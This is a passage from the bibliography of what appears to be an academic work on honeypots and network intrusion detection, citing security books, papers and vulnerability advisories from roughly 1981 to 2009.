Weighting Summation Decision Method to Incorrect Application. In: Socio-Economic
Planning Sciences 16 (1982), No. 4, p. 173–177
[Ruef 2007] Ruef, Marc: Die Kunst des Penetration Testing (German). C&L Computer
und Literaturverlag, 2007
[Russell 2002] Russell, Rusty: Linux 2.4 Packet Filtering. Published: 2002. http://
www.netfilter.org/documentation/HOWTO//packet-filtering-HOWTO.html, Retrieved: August 11, 2009
[Russinovich and Solomon 2004] Russinovich, Mark E. ; Solomon, David A.: Microsoft Windows Internals. 4th Edition. Microsoft Press, 2004
[Sadasivam et al. 2005] Sadasivam, Karthik ; Samudrala, Banuprasad ; Yang, T. Andrew:
Design of Network Security Projects Using Honeypots. In: Journal of Computing Sciences in Colleges (2005), p. 282–293
[Schneier 1996] Schneier, Bruce: Applied Cryptography: Protocols, Algorithms, and
Source Code in C. 2nd Edition. John Wiley & Sons, Inc., 1996
[Sebastiani 2002] Sebastiani, Fabrizio: Machine Learning in Automated Text Categorization. In: ACM Computing Surveys 34 (2002), No. 1, p. 1–47
[Secunia 2004] Secunia (Editor): Secunia Advisories: phpBB Multiple Vulnerabilities. Published: November 2004. http://secunia.com/advisories/13239/2/, Retrieved: August 11, 2009
[Secunia 2009a] Secunia (Editor): Secunia Advisories: Vulnerability Report: phpMyFAQ 1.x. Published: 2009. http://secunia.com/advisories/product/3487/
?task=advisories, Retrieved: August 11, 2009
[Secunia 2009b] Secunia (Editor): Secunia Advisories: Vulnerability Report: Tikiwiki
1.x. Published: 2009. http://secunia.com/advisories/product/3356/?task=
advisories, Retrieved: August 11, 2009
[SecurityFocus 2004] SecurityFocus (Editor): Microsoft Windows LSASS Buffer
Overrun Vulnerability. Published: 2004. http://www.securityfocus.com/bid/
10108/exploit, Retrieved: August 11, 2009
[SecurityFocus 2006a] SecurityFocus (Editor): MySQL Remote Information Disclosure and Buffer Overflow Vulnerabilities. Published: 2006.
http://www.securityfocus.com/bid/17780/discuss, Retrieved: August 11, 2009
[SecurityFocus 2006b] SecurityFocus (Editor): NewsPortal Remote PHP Script Code
Injection Vulnerability. Published: 2006. http://www.securityfocus.com/bid/
[SecurityFocus 2006c] SecurityFocus (Editor): PHPMyAdmin Multiple Cross-Site
Scripting Vulnerabilities. Published: 2006. http://www.securityfocus.com/bid/
15735/, Retrieved: August 11, 2009
[SecurityFocus 2006d] SecurityFocus (Editor): Webmin/Usermin Unspecified Information Disclosure Vulnerability. Published: June 2006.
http://www.securityfocus.com/bid/18744/, Retrieved: August 11, 2009
[Seifert et al. 2006] Seifert, Christian ; Welch, Ian ; Komisarczuk, Peter: HoneyC - The Low-Interaction Client Honeypot. Published: August 2006. http:
//homepages.mcs.vuw.ac.nz/~cseifert/blog/images/seifert-honeyc.pdf, Retrieved: August 11, 2009
[Seigo 2007] Seigo, Aaron J.: KDE Filesystem Hierarchy. Published: February
2007. http://techbase.kde.org/KDE_System_Administration/KDE_Filesystem_
Hierarchy, Retrieved: August 11, 2009
[Sen and Krömer 2008] Sen, Evrim ; Krömer, Jan: Hackerkultur und Raubkopierer - Eine wissenschaftliche Reise durch zwei Subkulturen (German). 2008
[Sharma 2005] Sharma, Mayank: CLI Magic: Logrotate. Published: October 2005.
http://www.linux.com/feature/48390, Retrieved: August 11, 2009
[Singh et al. 2004] Singh, Sumeet ; Estan, Cristian ; Varghese, George ; Savage,
Stefan: Automated Worm Fingerprinting. In: Proceedings of the 6th Conference on
Symposium on Operating Systems Design & Implementation, 2004, p. 45–60
[Skoudis and Zeltser 2003] Skoudis, Ed ; Zeltser, Lenny: Malware: Fighting Malicious
Code. Prentice Hall, 2003
[“B-Bstf” Smith 2004] Smith, Andrew “B-Bstf”: A Guide to Internet Piracy. In: 2600
- The Hacker Quarterly 21 (2004), No. 2, p. 26–29
[Sourcefire 2009] Sourcefire (Editor): Snort Users Manual. Published: 2009. http:
//www.snort.org/assets/82/snort_manual.pdf, Retrieved: August 11, 2009
[Spitzner 2000] Spitzner, Lance: Watching Your Logs. Published: 2000. http:
//www.spitzner.net/swatch.html, Retrieved: August 11, 2009
[Spitzner 2001a] Spitzner, Lance: The Value of Honeypots, Part One: Definitions and
Values of Honeypots. Published: 2001. http://www.securityfocus.com/infocus/
[Spitzner 2001b] Spitzner, Lance: The Value of Honeypots, Part Two: Honeypot
Solutions and Legal Issues. Published: 2001. http://www.securityfocus.com/
infocus/1498, Retrieved: August 11, 2009
[Spitzner 2002] Spitzner, Lance: Honeypots: Tracking Hackers. Addison Wesley, 2002
[Spitzner 2003a] Spitzner, Lance: Definitions and Value of Honeypots. Published:
2003. http://www.spitzner.net/honeypots.html, Retrieved: August 11, 2009
[Spitzner 2003b] Spitzner, Lance: The Honeynet Project: Trapping the Hackers. In:
IEEE Security & Privacy 1 (2003), No. 2, p. 15–23
[Spitzner 2003c] Spitzner, Lance: Honeypot Farms. Published: 2003. http://www.
securityfocus.com/infocus/1720, Retrieved: August 11, 2009
[Spitzner 2003d] Spitzner, Lance: Honeypots: Are They Illegal? Published: June
2003. http://www.securityfocus.com/infocus/1703, Retrieved: August 11, 2009
[Spitzner 2003e] Spitzner, Lance: Honeypots: Simple, Cost-Effective Detection.
Published: 2003. http://www.securityfocus.com/infocus/1690, Retrieved: August 11, 2009
[Spitzner 2003f] Spitzner, Lance: Honeytokens: The Other Honeypot. Published:
[Spitzner 2003g] Spitzner, Lance: Moving Forward with Defintion of Honeypots.
Published: May 2003. http://www.securityfocus.com/archive/119/321957/30/
0/threaded, Retrieved: August 11, 2009
[Spitzner 2004] Spitzner, Lance: Problems and Challenges with Honeypots. Published:
[Stevens and Merkin 1995] Stevens, Curtis E. ; Merkin, Stan: El Torito Bootable CD-ROM Format Specification. Published: January 1995.
http://www.phoenix.com/NR/rdonlyres/98D3219C-9CC9-4DF5-B496-A286D893E36A/0/specscdrom.pdf, Retrieved: August 11, 2009
[Stevens 1994] Stevens, William R.: TCP/IP Illustrated I - The Protocols. Addison-Wesley, 1994
[Stillwell et al. 1981] Stillwell, W.G. ; Seaver, D.A. ; Edwards, W.: A Comparison
of Weight Approximation Techniques in Multiattribute Utility Decision Making. In:
Organizational Behavior and Human Performance (1981), p. 62–78
[Stoll 2005] Stoll, Cliff: The Cuckoo’s Egg: Tracking a Spy Through the Maze of
Computer Espionage. Pocket Books, 2005
[SWITCH 2002] SWITCH: Default TTL Values in TCP/IP. Published: 2002.
http://secfr.nerim.net/docs/fingerprint/en/ttl_default.html, Retrieved: August 11, 2009
[Tanenbaum 2003] Tanenbaum, Andrew S.: Computer Networks. 4th Edition. Prentice
Hall, 2003
[Thomas and Martin 2006] Thomas, Rob ; Martin, Jerry: The Underground Economy:
Priceless. In: The USENIX Magazine 31 (2006), No. 6, p. 7–16
[Timm 2001] Timm, Kevin: Strategies to Reduce False Positives and False Negatives
in NIDS. Published: September 2001. http://www.securityfocus.com/infocus/
[Troan and Brown 2002] Troan, Erik ; Brown, Preston: LOGROTATE(8). Published:
November 2002. http://www.linuxcommand.org/man_pages/logrotate8.html, Retrieved: August 11, 2009
[Trümper 1999] Trümper, Winfried: Summary about Posix.1e. Published: 1999.
http://wt.tuxomania.net/publications/posix.1e/, Retrieved: August 11, 2009
[Turnbull 2005] Turnbull, James: Hardening Linux. APress, 2005
[Vaughan et al. 2000] Vaughan, Gary V. ; Elliston, Ben ; Tromey, Thomas: Gnu
Autoconf, Automake, and Libtool. New Riders Publishing, 2000
[Venema 1992] Venema, Wietse: TCP Wrapper: Network Monitoring, Access Control
and Booby Traps. In: Proceedings of the Third Usenix UNIX Security Symposium,
1992
[Vind 2005] Vind, Janek: XSS and Full Path Disclosure in PhpBB 2.0.8.
Published: January 2005. http://www.waraxe.us/index.php?modname=sa&id=34,
[Visa Inc. 2002] Visa Inc. (Editor): Visa Card Verification Value 2 (CVV2) Merchant
Guide - A Tool for Understanding CVV2 for Greater Fraud Protection. Published:
February 2002. http://www.bbbonline.org/eexport/doc/merchantguide_cvv2.
pdf, Retrieved: August 11, 2009
[VMWare 2006] VMWare (Editor): Virtualization Overview. Published: 2006. http:
//www.vmware.com/pdf/virtualization.pdf, Retrieved: August 11, 2009
[Vogelgesang 2007] Vogelgesang, Kay: The XAMPP Security Console.
Published: 2007. http://www.apachefriends.org/en/xampp-windows.html#1221,
[Wagner and Soto 2002] Wagner, David ; Soto, Paolo: Mimicry Attacks on Host-Based Intrusion Detection Systems. In: Proceedings of the 9th ACM Conference on
Computer and Communications Security, 2002
[Wang et al. 2006] Wang, Jisheng ; Hamadeh, Ihab ; Kesidis, George ; Miller,
David J.: Polymorphic Worm Detection and Defense: System Design, Experimental
Methodology, and Data Resources. In: Proceedings of the 2006 SIGCOMM workshop
on Large-scale attack defense, 2006, p. 169–176
[Wang et al. 2005] Wang, Yi-Min ; Beck, Doug ; Jiang, Xuxian ; Roussev, Roussi ; Verbowski, Chad ; Chen, Shuo ; King, Sam:
Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That
Exploit Browser Vulnerabilities. Microsoft Research, Technical Report MSR-TR-2005-72. Published: August 2005.
http://research.microsoft.com/en-us/um/redmond/projects/strider/honeymonkey/ndss_2006_honeymonkey_wang_y_camera-ready.pdf
[Watson 2007] Watson, David: GDH Global Distributed Honeynet. Published:
December 2007. http://www.ukhoneynet.org/PacSec07_David_Watson_Global_
Distributed_Honeynet.pdf, Retrieved: August 11, 2009
[Watson et al. 2005] Watson, David ; Holz, Thorsten ; Mueller, Sven ; Honeynet
Project (Editor): Know your Enemy: Phishing. Published: 2005. http://www.
honeynet.org/papers/phishing/, Retrieved: August 11, 2009
[Wicherski and Holz 2006] Wicherski, Georg ; Holz, Thorsten: Effektives Sammeln
von Malware mit Honeypots. In: Proceedings of 13th DFN-CERT Workshop, 2006
[Wikipedia 2007] Wikipedia: Comparison of Linux LiveDistros. Published: July
2007. http://en.wikipedia.org/wiki/Comparison_of_Linux_LiveDistros, Retrieved: August 11, 2009
[Willems et al. 2007] Willems, Carsten ; Holz, Thorsten ; Freiling, Felix: Toward
Automated Dynamic Malware Analysis Using CWSandbox. In: IEEE Security &
Privacy 5 (2007), No. 2, p. 32–39
[Woo 2003] Woo, Hyung-Jin: The Hacker Mentality: Exploring the Relationship Between Psychological Variables and Hacking Activities, University of Georgia, (PhD
Thesis), May 2003
[Wright et al. 2004] Wright, Charles P. ; Dave, Jay ; Gupta, Puja ; Krishnan,
Harikesavan ; Zadok, Erez ; Zubair, Mohammad N.: Versatility and Unix Semantics in a Fan-Out Unification File System. Published: October 2004. http:
//www.am-utils.org/docs/unionfs-tr/index.html, Retrieved: August 11, 2009
[Yoon and Hwang 1981] Yoon, Kwangsun ; Hwang, Ching-Lai: Multiple Attribute
Decision Making: Methods and Applications. Springer, 1981
[Yoon and Hwang 1995] Yoon, Kwangsun ; Hwang, Ching-Lai: Multiple Attribute
Decision Making: An Introduction. Sage, 1995
[Zalewski 2005] Zalewski, Michal: Silence on the Wire: A Field Guide to Passive
Reconnaissance and Indirect Attacks. No Starch Press, 2005
[Zalewski 2006] Zalewski, Michal: p0f 2 - Passive OS Fingerprinting Tool. Published:
2006. http://lcamtuf.coredump.cx/p0f/README, Retrieved: August 11, 2009
[Zhang and Leckie 2006] Zhang, Dana ; Leckie, Christopher: An Evaluation Technique
for Network Intrusion Detection Systems. In: Proceedings of the 1st International
Conference on Scalable Information Systems, 2006
[Zhang 2004] Zhang, Harry: The Optimality of Naive Bayes. In: Proceedings of the
17th International FLAIRS Conference, 2004